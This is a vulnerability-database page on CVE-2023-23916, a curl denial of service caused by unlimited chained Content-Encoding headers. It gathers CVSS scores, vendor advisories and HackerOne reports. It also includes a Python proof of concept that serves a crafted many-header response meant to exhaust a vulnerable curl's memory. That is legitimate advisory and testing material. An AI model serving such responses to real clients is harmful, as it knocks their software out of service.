CVE-2023-23916
Published 2023-02-23
Priority: P4 · 31 · medium · 6.5 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
EPSS: 1.70% (74.3rd percentile)
An allocation of resources without limits or throttling vulnerability exists in curl <v7.88.0 based on the "chained" HTTP compression algorithms, meaning that a server response can be compressed multiple times and potentially with different algorithms. The number of acceptable "links" in this "decompression chain" was capped, but the cap was implemented on a per-header basis, allowing a malicious server to insert a virtually unlimited number of compression steps simply by using many headers. The use of such a decompression chain could result in a "malloc bomb", making curl end up spending enormous amounts of allocated heap memory, or trying to and returning out of memory errors.
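The mechanism above (a cap that restarts for every Content-Encoding / Transfer-Encoding header, so a response carrying many headers builds an arbitrarily long decompression chain) is easiest to see side by side. The Python below is an added example written for this page, not curl's code: it parses a constructed response head, applies the pre-7.88.0 per-header check next to the whole-chain check that the fix amounts to, and can serve that constructed response on loopback so a lab build of curl can be pointed at it. Assumptions: the cap of 5 is my recollection of curl's `MAX_ENCODE_STACK` in `lib/content_encoding.c` and should be checked against the source; `chunked` is skipped as framing rather than compression; the response bytes and the function names are constructed here.

```python
import socket
import sys

# Assumed per-header link cap; curl's MAX_ENCODE_STACK as I recall it (verify in source).
MAX_ENCODE_STACK = 5
ENCODING_HEADERS = ("content-encoding", "transfer-encoding")


def parse_headers(raw):
    """Split a raw HTTP/1.1 response head into (name, value) pairs; no line folding."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    pairs = []
    for line in head.split("\r\n")[1:]:  # drop the status line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        pairs.append((name.strip().lower(), value.strip()))
    return pairs


def encoding_links(raw):
    """Yield, per encoding header in order, the list of decompression steps it requests.
    'chunked' is transfer framing, not a compression step, so it is not counted here."""
    for name, value in parse_headers(raw):
        if name in ENCODING_HEADERS:
            links = [tok.strip().lower() for tok in value.split(",")]
            yield [tok for tok in links if tok and tok != "chunked"]


def chain_ok_per_header(raw):
    """Pre-7.88.0 shape of the check: the counter restarts at every header,
    so N headers with 5 links each all pass and the chain is N*5 deep."""
    for links in encoding_links(raw):
        if len(links) > MAX_ENCODE_STACK:
            return False
    return True


def chain_ok_total(raw):
    """Fixed shape of the check: one counter across all headers of the response."""
    depth = 0
    for links in encoding_links(raw):
        depth += len(links)
        if depth > MAX_ENCODE_STACK:
            return False
    return True


def total_chain_length(raw):
    """How many decoders a client would stack if it honoured every header."""
    return sum(len(links) for links in encoding_links(raw))


def malicious_response(n_headers, per_header=MAX_ENCODE_STACK):
    """Constructed response head: many encoding headers, each inside the per-header cap."""
    lines = ["HTTP/1.1 200 OK", "Connection: close"]
    lines += ["Content-Encoding: " + ", ".join(["gzip"] * per_header)] * n_headers
    lines += ["Content-Length: 0", "", ""]
    return "\r\n".join(lines).encode("ascii")


def serve_once(host="127.0.0.1", port=8080, n_headers=10000):
    """Answer exactly one connection with the constructed head (loopback lab use only)."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(1)
        conn, _ = srv.accept()
        with conn:
            conn.recv(4096)  # read and ignore the request
            conn.sendall(malicious_response(n_headers))


if __name__ == "__main__":
    head = malicious_response(1000)
    print("chain length:", total_chain_length(head))
    print("per-header check passes:", chain_ok_per_header(head))
    print("whole-chain check passes:", chain_ok_total(head))
    if "--serve" in sys.argv:
        serve_once()
```

Run without arguments to see the two checks disagree on the same bytes; run with `--serve` in a throwaway container that has a pre-7.88.0 build and fetch `http://127.0.0.1:8080/` with it while watching the process's memory. A fixed build rejects the response with an error once the whole chain exceeds the cap instead of allocating a decoder per link.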
Affected
37 ranges (partial listing)

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | curl | < 7.88.1-1 (bookworm) | 7.88.1-1 (bookworm) |
| debian | debian_linux | — | — |
| fedoraproject | fedora | — | — |
| haxx | curl | >= 0 < 7.74.0-1.3+deb11u7 | 7.74.0-1.3+deb11u7 |
| haxx | curl | >= 0 < 7.88.1-1 | 7.88.1-1 |
| haxx | curl | >= 0 < 7.58.0-2ubuntu3.23 | 7.58.0-2ubuntu3.23 |
| haxx | curl | >= 0 < 7.68.0-1ubuntu2.16 | 7.68.0-1ubuntu2.16 |
| haxx | curl | >= 0 < 7.81.0-1ubuntu1.8 | 7.81.0-1ubuntu1.8 |
| haxx | curl | >= 7.57.0 < 7.88.0 | 7.88.0 |
| msrc | azl3_cmake_3.21.4-10_on_azure_linux_3.0 | — | — |
| msrc | azl3_cmake_3.28.2-1_on_azure_linux_3.0 | — | — |
| msrc | azl3_rust_1.75.0-14_on_azure_linux_3.0 | — | — |
| msrc | azl3_rust_1.86.0-1_on_azure_linux_3.0 | — | — |
| msrc | azl3_tensorflow_2.11.1-1_on_azure_linux_3.0 | — | — |
| msrc | azl3_tensorflow_2.16.1-1_on_azure_linux_3.0 | — | — |
| msrc | azure_linux_3.0_arm | — | — |
| msrc | azure_linux_3.0_x64 | — | — |
| msrc | cbl2_cmake_3.21.4-13_on_cbl_mariner_2.0 | — | — |
| msrc | cbl2_curl_7.88.1-1_on_cbl_mariner_2.0 | — | — |
| msrc | cbl2_mysql_8.0.33-1_on_cbl_mariner_2.0 | — | — |
| msrc | cbl2_rust_1.72.0-2_on_cbl_mariner_2.0 | — | — |
CVSS provenance

| Source | Score | Severity | Vector |
|---|---|---|---|
| nvd (v3.1) | 6.5 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H |
| osv | 9.1 | CRITICAL | — |
| vendor_ubuntu | 9.1 | CRITICAL | — |
| vendor_oracle | 7.5 | MEDIUM | — |
| vendor_debian | 6.5 | MEDIUM | — |
| vendor_msrc | 6.5 | MEDIUM | — |
| vendor_redhat | 6.5 | MEDIUM | — |

The 9.1 from osv and Ubuntu is the score attached to the multi-CVE Ubuntu advisory listed below, which also covers the HSTS bypass issues CVE-2023-23914 and CVE-2023-23915; it is not an independent rating of this denial of service. Oracle's 7.5 is what the NVD vector scores with the user-interaction requirement dropped (UI:N); all other sources agree on 6.5, availability impact only.
Oracle
Oracle Communications Risk Matrix: Configuration (cURL)
vendor_oracle · 2023-04-15 · CVSS 7.5 [MEDIUM]
CVE: CVE-2023-23916
CVSS: 7.5
Protocol: HTTP
Remote exploit: Yes
Attack vector: Network
Advisory: cpuapr2023 (Critical Patch Update, April 2023)
Ubuntu
curl vulnerabilities
vendor_ubuntu · 2023-02-27 · CVSS 9.1 [CRITICAL] (indexed under CVE-2023-23915; the advisory covers CVE-2023-23914, CVE-2023-23915 and CVE-2023-23916)
Summary: Several security issues were fixed in curl.
Harry Sintonen discovered that curl incorrectly handled HSTS support
when multiple URLs are requested serially. A remote attacker could possibly
use this issue to cause curl to use unencrypted connections. This issue
only affected Ubuntu 22.04 LTS, and Ubuntu 22.10. (CVE-2023-23914)
Harry Sintonen discovered that curl incorrectly handled HSTS support
when multiple URLs are requested in parallel. A remote attacker could
possibly use this issue to cause curl to use unencrypted connections. This
issue only affected Ubuntu 22.04 LTS, and Ubuntu 22.10. (CVE-2023-23915)
Patrick Monnerat discovered that curl incorrectly handled memory when
processing requests with multi-header compression. A remote attacker could
Red Hat
curl: HTTP multi-header compression denial of service
vendor_redhat · 2023-02-15 · CVSS 6.5 [MEDIUM] · CWE-770
Description: as in the upstream text at the top of this page.
A flaw was found in the Curl package. A malicious server can
Microsoft
CVE-2023-23916 [MEDIUM] CWE-770: allocation of resources without limits or throttling in curl <v7.88.0
vendor_msrc · 2023-02-14 · CVSS 6.5
FAQ: Is Azure Linux the only Microsoft product that includes this open-source library and is therefore potentially affected by this vulnerability?
One of the main benefits to our customers who choose to use the Azure Linux distro is the commitment to keep it up to date with the most recent and most secure versions of the open source libraries with which the distro is composed. Microsoft is committed to transparency in this work which is why we began publishing CSAF/VEX in October 2025. See this blog post for more information. If impact to additional products is identified, we will update the CVE to reflect this.
Tags: Mariner, hackerone
Customer Action Required: Yes
Remediation: CBL-Mariner Rel
Debian
CVE-2023-23916: curl
vendor_debian · 2023 · CVSS 6.5 [MEDIUM]
Description: as in the upstream text at the top of this page.
Scope: local
bookworm: resolved (fixed in 7.88.1-1)
bullseye: resolved (fixed in 7.74.0-1.3+deb11u7)
forky: resolved
OSV
curl vulnerabilities
osv · 2023-02-27 · CVSS 9.1 [CRITICAL] (indexed under CVE-2023-23914)
Advisory text: identical to the Ubuntu entry above; it covers the two HSTS issues (CVE-2023-23914, CVE-2023-23915) and the multi-header compression resource consumption reported by Patrick Monnerat (CVE-2023-23916).
GHSA
GHSA-v8vq-prc2-j6gx (CVE-2023-23916)
ghsa_unreviewed · 2023-02-23
Description: as in the upstream text at the top of this page.
OSV
CVE-2023-23916
osv · 2023-02-23 · CVSS 6.5 [MEDIUM]
Description: as in the upstream text at the top of this page.
No detection rules found.
No public exploits indexed.
HackerOne
HTTP multi-header compression denial of service
hackerone · 2023-02-24 · CVSS 6.5 [MEDIUM]
A server can send an HTTP response with many occurrences of Transfer-Encoding and/or Content-Encoding headers. Each listed encoding allocates a buffer. The number of encodings listed within each header is already limited but the number of headers is not, allowing an HTTP response to consume all available memory.
## Impact
Consumes all available memory, resulting in a DoS.
CVE-2023-23916: HTTP multi-header compression denial of service
Project curl Security Advisory, February 15th 2023
VULNERABILITY
curl supports "chained" HTTP compression algorithms, meaning that a server response can be compressed multiple times and potentially with different algorithms. The number of acceptable "links" in this "decompression chain" was capped, but the
HackerOne
CVE-2023-23916: HTTP multi-header compression denial of service
hackerone · 2023-02-20 · CVSS 6.5 [MEDIUM]
## Summary:
A server can send an HTTP response with many occurrences of Transfer-Encoding and/or Content-Encoding headers. Each listed encoding allocates a buffer. The number of encodings listed within each header is already bounded but the number of headers is not, allowing an HTTP response to consume all available memory.
## Steps To Reproduce:
Using the curl test environment:
1. Extract test418 from the attached patch
2. runtests.pl 418
## Supporting Material/References:
Patch fixing the problem and new test for the case.
## Impact
Denial of service.
References
- https://hackerone.com/reports/1826048
- https://lists.debian.org/debian-lts-announce/2023/02/msg00035.html
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BQKE6TXYDHOTFHLTBZ5X73GTKI7II5KO/
- https://security.gentoo.org/glsa/202310-12
- https://security.netapp.com/advisory/ntap-20230309-0006/
- https://www.debian.org/security/2023/dsa-5365
Published: 2023-02-23